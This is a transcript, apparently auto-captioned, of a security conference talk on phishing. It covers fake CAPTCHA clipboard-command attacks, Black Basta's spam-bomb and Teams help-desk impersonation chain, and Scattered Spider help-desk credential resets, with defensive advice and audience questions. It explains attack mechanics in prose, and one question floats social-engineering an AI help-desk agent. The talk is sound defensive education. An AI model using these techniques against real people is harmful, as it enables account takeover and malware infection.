From Hooks to Shields: The Evolution of Phishing and the Art of Defense

Welcome everybody. We'll jump in here. All right. So, as mentioned, we're going to talk about the evolution of fishing attacks. Specifically, we're going to cover three notable tactics that we've seen used against Reliable Quest customers in the last few years. We're going to talk about capturebased fishing. We're going to talk about Blackbasta teams impersonation and scattered spider VIP impersonation. We're going to go into a breakdown of what the actual tactic is, show you some examples, some notable campaigns, and also how you can defend yourselves and your organizations. First off, I want to start with why we should care about fishing. Very often we think that fishing is just a suspicious email with some typos through it, but

it's evolved into many more tactics as we'll see today and it still remains one of the most prevalent threats that we see used against Reive Quest customers successfully to deploy ransomware and steal sensitive data. Ultimately, end users still remain the weakest link in the chain. It's very difficult to get non-technical users to understand how to protect themselves, especially as these tactics keep growing. >> Can I ask a question? >> Yeah. >> Isn't it true that because most, as you just said, most of the attacks are fishing attacks or you may have a third party aggregator that's compromised, it's holding all the crown jewels anyway, that increasingly more complicated passwords seem to be a nothing sandwich.

Uh there there is a limit on complex passwords, but it it also depends on how the passwords are secured and and what's behind them. Definitely. Yeah. As we'll see here, there are a few tactics that thread actors are using to easily get around those. Yeah. So, we'll start out with capture based fishing. So, what is it? It's a social engineering tactic that tricks the user into executing malicious code. It does this through displaying a popup on the web page in order to instruct the user how to execute the commands. It masquerades as a capture. You may have seen these legitimate captures over here and they are used to login portals to verify your identity. You may see the

verify you're not human or you are human, excuse me. It's also known as fakes capture and it's a child of the clickfix malware. So clickfix came before it and also displayed a popup instructing the user to execute code ultimately downloading malware on their system. So the attack chain goes everything is driving traffic to the compromised web page. There's quite a few ways it can do this. Malicious ads can be injected into a web page that already has user traffic. Fishing emails can have links directly embedded that then go to the compromised web page or SEO poisoning, search engine optimization poisoning used to drive traffic directly to those compromised web pages. From there, it's redirected to a fishing domain that the

attacker controls where the fake capture is then displayed. Over here on the right hand side, you can see an example of what the fake capture actually looks like. It's got very simple instructions for the user to press hotkeys on the command and ultimately execute the malicious command. As it happens, as the web page displays, the malicious command is injected via JavaScript into the user's clipboard without them even knowing. >> Question. If the user has JavaScript disabled on their browser, that would mediate that, correct? Mitigate that. >> Yes, that's true. Yeah. >> And uh from there, they're instructed to open up the run prompt and execute the command themselves, which leads to the malware installation. Let's break down

this command a little bit more. All right, as you can see, this is an example of one of the most prevalent commands we've seen. It utilizes the legitimate Windows executable MSHTA, also known as MISTA, to execute this HTML file here. It does so from the attacker control domain. And one thing I want to specifically highlight is the verify you're human comment seen directly in the command itself. And notice how it's at the end of the comment. So specifically what the user sees is just verify you're a human in the run prompt. They don't see anything suspicious in the command itself. So there's nothing to tip them off. Following this, a secondary command is executed via PowerShell

invoking an expression to download another file from another attacker control domain. In this case, a PNG file. So, be careful about these PNG files. We've seen JPEGs, we've seen MP3, MP4 files also being downloaded as malicious scripts. Another thing I want to highlight is the >> Can we hold the questions for the end, please, just so not too many disruptions. Thank you. >> Um, so just to highlight there's obuscation taking place throughout. As you can see, the different commands being executed in PowerShell are being defined as these C dollar sign variables. So they can then be executed in one to prevent defenders and security tools from noticing the execution. Another variant we've seen is encoded

PowerShell being used. So in this case, the injected command is entirely encoded. So there's no information available to the user whatsoever. The same uh easy to use hotkeys are displayed to the user to execute it. And if you're familiar and technical, you might recognize that equal sign means that this is encoded in B 64. Overall, we've seen quite a bit of malware executed through this campaign. We've seen info stealers that can harvest credentials and sensitive information off the computer. We've seen remote access trojans, things that give the threat actor control of the infected host. Worms that spread rapidly throughout the environment. Ransomware that encrypts computers and locks them down so they can't be used until a

ransom is paid. And finally, root kits that compromise the underlying hardware of the machine. One of the most notable campaigns we've seen was the use of fake capture against hospitality organizations masquerading as Booking.com. So, this was delivered through a fishing email that says within the email that users need to verify their Booking.com account. It was heavily targeted towards hospitality and users who are likely to use Booking.com. The link directly in the email drives them to a fake capture website. And this campaign spread info stealers. It spread remote access trojans and worms. Another campaign dealt with malicious ads being injected into video streaming sites. So be careful if you use these free video and TV streaming sites such

as Soap Today and 123 Movies because these had ads directly injected into them to bring you to fake capture domains. All right. So, how can you protect yourself? >> Organizations should instruct users to recognize copypaste abuse and be very careful when they're instructed from web pages to press controlV. There's very little use case to ever do that in an actual legitimate environment. You should disable browser credential storage. So, these are targeted by info stealers to get access to accounts. So when you go on Google and you log in, it says, "Would you like me to remember your password?" You should almost always say no. Use those password managers, Bit Warden, LastPass, etc. Limit PowerShell usage. You can

deploy a constrained language mode. Essentially, this just prevents non-administrator users from executing certain PowerShell commands. Stops a lot of this. And then the next one, this is the biggest one, disable the Windows run key in the environment. This completely stops the tactic throughout, no matter how it's deployed. Defenders should monitor for Misha commands with suspicious phrases such as verify you're human. You should also monitor for PowerShell file downloads and encoded PowerShell. These last two here, there is some legitimate use cases. for example, your IT power users who like to do power user things. However, there are very limited use cases that actually happen. The next notable campaign we're going to talk about is Blackbasta based fishing.

If you're not familiar with Blackbasta, they are a notorious ransomware as a service group. They've certainly made a name for themselves. This campaign follows an email spam bomb that then leads into teams fishing either through a chat message or a phone call, help desk impersonation, and convincing the user to join a remote session and give the attacker control of their machine. If you're not familiar, an email spam bomb takes place when thousands of emails are sent to a user's inbox within minutes. It makes that inbox entirely unusable and also gives the attacker pretext to impersonate the help desk to solve that issue. We've seen this advertised on the dark web for sale, specifically not starting at $9 for one

and up to $500 for lifetime access. This works by taking the target email address and signing them up for newsletters and account creations. So that way those instant messages, thank you for signing up, all get sent over at once. It seems to be a wide range. Those emails that come in to the user are across different languages. We've seen French, Italian, Spanish, Russian, anything the attacker can find. You might also be familiar with this method in personal space. So for example, a family friend of mine experienced something very similar where their personal email was flooded with a bunch of emails. And I likely theorized that that was to hide configuration changes to their payment processing

portals so they wouldn't actually notice what needed was changed by someone who had access to that account. Now this was a relatively older person to date things a little bit. They were using a Bell South email address. So that should help. So definitely interesting tactic. However, in this case it establishes the pretext for the threat actor to impersonate. So as I mentioned the communication through teams can take place via a direct message or a phone call. The communication comes from compromised legitimate tenants. So, organizations that use Office 365 that have been compromised, the attacker can then communicate directly to the target tenant through there or the attacker spins up these on Microsoft domains which are very easy for the attacker to

spin up and also give the attacker some legitimate context with the Microsoft name in their domain. As you notice, we've seen examples where the subdomain also supports the impersonation pretext. In this case, the subdomain includes security administrator or support service.

Continuing on, the team's message itself, the chat names will further include IT support or help desk and all of the dropped files. Once the attacker has control of the machine, the malicious files dropped include naming conventions that supports the pretext that they're going to fix the email spam. You can see filters in the naming and anti-PAM in the naming. The quick assist, excuse me, the remote session is driven by a few different tools including quick assist, teams, anyes, and screen connect. It's very simple for the thread actor just to provide a code to the user that they can join. One of the most dangerous things about quick assist is that it is now native on all Windows 11 hosts. And very

similar to what we saw in the fake capture, the thread actor can just instruct the user to press a simple hotkey Windows control Q and then all of a sudden they see this screen, they enter the code and they're off to the races. Again, it's very easy to convince a non-technical user just to press a few buttons rather than go searching for a specific program they know nothing about. An interesting piece of this method is that in an customer environment, we saw multiple initial access kill chains taking place simultaneously. What do I mean? So, 15 plus users at this organization received that email spam bomb. From there, fishing team's chat messages were sent to all of them. We

saw one user engage with the thread actor and join that quick assist session. Malicious files were then dropped on that host by the thread actor and processes on the host were injected. The thread actor here failed lateral movement and at this time this host was completely left alone. They didn't come back to it. Then user two joins a quick assist session. Malicious files were also dropped on this host and processes were injected. lateral movement to takes place to get to other hosts on the network ultimately leading to data exfiltration. So it's been theorized that there are multiple groups within Blackba, one of which is completely responsible for that initial access kill chain and also the

other one controls the ransomware deployment and development. that initial access group they are specializing in the email spam bomb the help desk impersonation through teams quick assist sessions and they also use tools like evil proxy for credential theft and system BC for persistence and C2 the ransomware group itself they have ties to the previous ransomware as a service group Conti that has now disbanded they use similar tactics and malware they have strict affiliate selection So, a lot of these other ransomware as a service group will advertise on the dark web trying to get as many affiliates as possible. Blackbas are established and have notorious reputations in other high-profile campaigns. There's a reason for that we'll see in the next slide. And then

finally, they discourage targeting of those former Soviet Union states such as Russia, Bellarus, etc. likely pointing that they are from Russia themselves. So if you're unfamiliar, in February 2025, the internal chat communications of Blackbasta were leaked and actually provided a lot of valuable insights. So one of the insights is that there were different groups and roles defined within the organization. specifically that intrusion that initial access group did exist including managers, developers, botnet operators, infrastructure management and edr research and development trying to get around those defensive tools that are common on hosts. Another interesting insight is that this group charged a million dollar price tag for year-long access to their software. Likely why they were so selective about their

affiliates. They want people who have that capital to and actually be able to access the software. This chat communication also s showed lots of internal squabbbling between the users, specifically things about pay, leadership decisions, and the group's decision to start targeting Russian banks. This caused quite a few of the affiliates to leave the group and go to other groups. So, if you're not familiar, Russia allows threat actors to operate under the pretext that they do not target entities within Russia. You can target enemies of Russia, but do not target us or we will come after you. So, the decision to do this uh caused a lot of turmoil between the group and caused fear within the group, driving those

other users away. >> Of course, not just Russia. We did that too. >> Well, fair state letters of Mark. Mhm. Um, and one of the biggest parallels between this group and Kanti is that Kanti also had chat logs leaked from a disgruntled user, which is very interesting. So, one of the best parallels that shows this group likely managed affiliates from the two as you can see from Blackbasta. So, on the left hand side is their number of organizations they name on their data leak site. So essentially, who are they attacking and whose data do they claim they have? From October of 2023 through October of 2024, excuse me, through April of 2024. And on the right hand

side is October of 2024 through April of 2025. You can see in February 2025, at the same time those chat logs were released, a significant drop off in the actual uh organizations named on their data leak site. And this signifies the decline of the Blackbuster ransomware. However, be mindful that the tactic we addressed here is still very prevalent in organizations. And as I mentioned, that initial access group that is utilizing the tactic is now likely going to move to other ransomware deployments. So, we still see this all the time. So, what can organizations do? First of all, educate those users about Teams fishing. Be very suspicious about the chats that include help desk. Certainly they can recognize the email spam bomb

coming in and know the following steps will likely be social engineering. Join a remote session. When I work desktop support, we almost never had to ask a user to join a session. We always could just control it at will. So depending on what's in your environment, you may have use cases, but we'll show you some methods for that. So if that's the case, educate those users. We will never tell you to join a session. We will just access your computer as needed. Disable unused remote session tools, specifically quick assist. Make sure screen connect and other tools you're not using in your environment are disabled and audit regularly for them. And then implement strict help desk

verification procedures. So in this case, the problem was the help desk was the thread actor. The user needs to be able to verify who they're talking to through a variety of means. So for example, teams often integrates with a actual hierarchy. So you can look in teams to see a hierarchy of users. You can establish predefined uh passphrases, something like red, blue, one, just something unique that your organization knows. You can confirm computer names. You can confirm um you can do MFA pushes through certain MFA devices. So for example, when I work desktop support, we could send a push to the user to confirm identities between the two. So you can set up quite a few

different verifications. If possible, block external domain communication through teams so that those external domains cannot even reach out to you. If not possible, allow list those approved domains to communicate. Defenders should monitor or excuse me should first enable teams logging specifically the chat created message. This allows you to see that initial pretext that takes place between the thread actor and monitor for external team chats that include help desk or IT support specifically those communications from on.microsoft.com domains and then also monitor for suspicious files that include update or anti-pam. The final notable tactic we'll talk about is scattered spider VIP impersonation. And this tactic takes place from the threat actor contacting the help desk. They impersonate an employee. The help

desk resets the account credentials for them and provides the threat actor access to the account. So we're going to look at two separate campaigns and there are two critical issues around these campaigns. One is that help desk members are not following the standard operating procedures, those SLPs to verify the user is who they say they are before they reset credentials and provide access. And then the second one is that the verification details that they are being provided are easily discoverable online through OSENT and information gathering. So, if you're not familiar, scattered spider, also known as UNC 3944, or as one of my fellow co-workers likes to say, UNC 3944, OctoPest, and Roasted Octopus. They're a loosely associated

network of thousands of English-speaking users all over the world. So, a lot of groups are a lot more defined. This one's very loose, hence the name scattered. They share knowledge and tactics between the two or excuse me between them including social engineering. They're common for fishing domains that include the targeted company name as the subdomain and many variations of octadash or SSO dash. They also are known for MFA fatigue attacks and ransomware deployment. We'll see quite a few different ransom wares in the chains we'll look at. So the first one we're going to talk about is MGM, the famous casino in Vegas. This is a very public attack that happened in 2023. In this case, OSENT was performed on the

employees to discover information and job roles. A call was made to the help desk. From there, the discovered information was provided to the help desk for verification. The help desk resets the credentials. That account is then used to gain administrator privileges. The threat actor is able to move laterally in the network and access other hosts. and ultimately Alv ransomware was deployed. This particular attack chain it was estimated cost MGM tens of millions of dollars in downtime and uh security cost. Here's an attack chain that we saw against a manufacturing customer. First OSEN's performed against VIP to discover job roles and that key information. A call is made to the help desk. The CFO is impersonated in that

call. the chief financial officer. The help desk resets credentials to those accounts. Then the threat actor attempts access to that account but realizes they cannot get through the MFA. In this case, a second impersonation call is made to the help desk. The MFA is very conveniently reset on the CFO's account. The CFO's account is then accessed. We'll continue on to the next page. From there, the CFO's MFA or multiactor authentication device is then paired with an attacker control device. The attacker attempts to use this account to access Octa admin console. So, Octa is the identity management software. They realize they do not have the proper credentials in this account. However, they are able to discover additional

information, specifically the account for a domain admin. So, a third call is now conveniently made to the help desk. Credentials are reset for this account. They use this account to access octa and thsycotic tenants. If you don't know, thsotic is password manager solutions. Virtual machines are deployed within VMware exsi giving attacker owned devices in the network. Credentials are ultimately dumped or captured and the data is excfiltrated before ransom hub encryptors are deployed. This caused significant downtime for the organization and ultimately was the result of the help desk not following those verification procedures. Recently in February and April of 2025, three UK retailers were just hit by a string of ransomware. Marks and Spencer, Co-op, and Herods.

They deployed Dragon Force ransomware in two of three of these attacks. It's theorized. It's theorized that this is scattered spider behind this. One of the best pieces of evidence for this is that NCSC has told organizations they should reassess how their IT staff authenticates staff members before resetting passwords. So, very much ties into the tactic we've seen used here. Co-op also warned its employees not to post sensitive info in Teams and verify via webcams co-workers and calls. So also likely suggesting there's teams impersonation taking place. How can organizations protect themselves? Educate IT staff about voice fishing or vishing or vi voice over IP fishing. Implement strict help desk verification procedures. As we mentioned those unique keywords that your

organization establishes and this time the uh help desk needs to verify who is on the other end. So you need verification between both, right? Remember in the black basta kill chain, we saw that the user needs to verify they're speaking to the help desk. In this case, the help desk needs to verify that they're speaking to the user. Also, you can do those MFA pushes from the help desk. As I mentioned earlier, audit the help desk to make sure they are following these practices. So maybe your CISO just places a casual call. Maybe it's actually implemented in your red team testing, but make sure something is done to verify. Defenders can monitor for MFA resets on

high-privilege accounts followed by admin console login and also monitor for those suspicious domains including your organization's name in the variance of octadash or sso dash. All right. So overall I want to stress that fishing is more than just those common emails with links and malware that we see. Educating users is the organization's best defense against fishing. Tactics will evolve. These will change. However, organization or end users should be on the lookout for anything suspicious. And then again, strict verification procedures, SOPs, and auditing for help desk communications helps stop these attacks. Thank you everyone. As mentioned, my name is John Diljen. I'm one of the threat analysts, intelliquest. Feel free to add me on LinkedIn and I

hope you guys enjoy your B sites. >> Thank you. Questions? I saw you first and we'll get to you. >> So in the scattered spider attack, what's the purpose of the CFO impersonation? We've seen that too, but the CFO is not a domain admin. So what is that part of the chain for? >> Yeah, it's it's difficult to say why they targeted there. They may have been hoping for uh the ability to uh falsify financial records and reroute payment transactions. We we didn't have insight into that, though. We just know that they attempted to get to the octa and and thyotic tenants and failed. >> Wire transfer authorizations. It was a good one. >> Yeah. Question here.

>> Yeah, just three quick ones. When you referenced the PNG earlier, are you guys seeing more that it's an actual image file, movie file, etc. Or is it just a renamed file extension? >> Uh I I don't have the data of that. I I couldn't actually tell you. >> Next one. When we look at the Windows run key and the PowerShell being disabled for Windows user, are we seeing so few of those attacks in the Mac side that it's not worth giving the advice to the Mac people or should we give the advice to the Mac people? >> Uh their equivalent >> I I I don't know. I haven't seen the attacks and their equivalents. So yeah.

>> And um finally we look at email bombs unless they're rotating MX record and IP addresses and even if they are aren't most of the major email services mitigating that automatically. >> No, unfortunately not. No. Even without the rotated IP address in MX. >> Yeah. >> Holy >> Yeah. >> Yeah. Wow. >> Yeah. Unfortunately, >> you're welcome. >> Another question. >> Uh we don't we unfortunately don't have an average. It's it's the only one we have is the public information around MGM that was public. That was public estimates which was I think uh close to 100 million. >> Yeah. Yeah. Over here. Question here. >> Malicious AI models being campaigns. How how is that impact

>> uh AI models and fishing campaigns? Well, it's certainly making it easier for threat actors to deploy fishing emails very rapidly as well as create those uh impersonation web pages. Um, however, we're also seeing tools like Dracula being offered that implement the AI fishing kits within them and allow for uh brand impersonation directly in websites very easily and quickly. Yeah. Question here. kind of in that same vein like like about like agentic like workforce help desk, right? So like has you have you seen anybody like take advantage of like a Salesforce agent to reset a password? That's a very like lowlevel thing that they're trying to implement and so I just can't wait to like social engineer and AI to let me

in. >> Yeah. >> So have you seen that at all in a while? >> It's not something I'm familiar with, but I it's it's probably likely. It's probably out there. Yeah. >> Over here post the slides or is it possible? >> Yeah. Yeah. So the slides will be posted. Um, as well as the the full talk is recorded and will be posted to YouTube. Yep. Cool. Any other questions over here? >> Do you believe like that when you saying the malicious AI ones, do you think they're better? Like do you think they trick people better than the ones that are sometimes misspelled by people at some? >> Um, yes. Because in high volume that's what

matters. It's ultimately a numbers game and the the AI agents allow you to get them out faster and easier. Yeah. Any other questions? Yes. So do you have any good idea to train a people like in organizations are not highly technically trained and they believe like if you help that something they feel like you're going to hack the voice like do you have any good idea to like convince them we recently have like they link themsel to fake Microsoft >> login and they seeing all that and they just got their information but >> they are refusing to use more MFA to verify. Do you have any good idea to convince? >> Yeah, I would say the best method is

something the organization predefineses with the user and the help desk. So can I do you have a computer name tag on your workstation for example and I can reference that computer name tag to verify who we are, right? um is it's like a a a passphrase that we predefined something goofy red blue one or uh Tuesday was yesterday something like that that's very generic but that's predefined that that they can look out for um for those non-technical users it is going to be a challenge but I would say the the organization's best defense is whatever policies they set up in place >> although you know academically if security doesn't hold up when the security algorithm is known it's not

good security >> fair >> that's that's troublesome isn't it >> yeah Yep. >> Yep. Yeah. And and that's why it's important to to verify and audit them. Definitely. Any other questions? All right. Thank you everyone.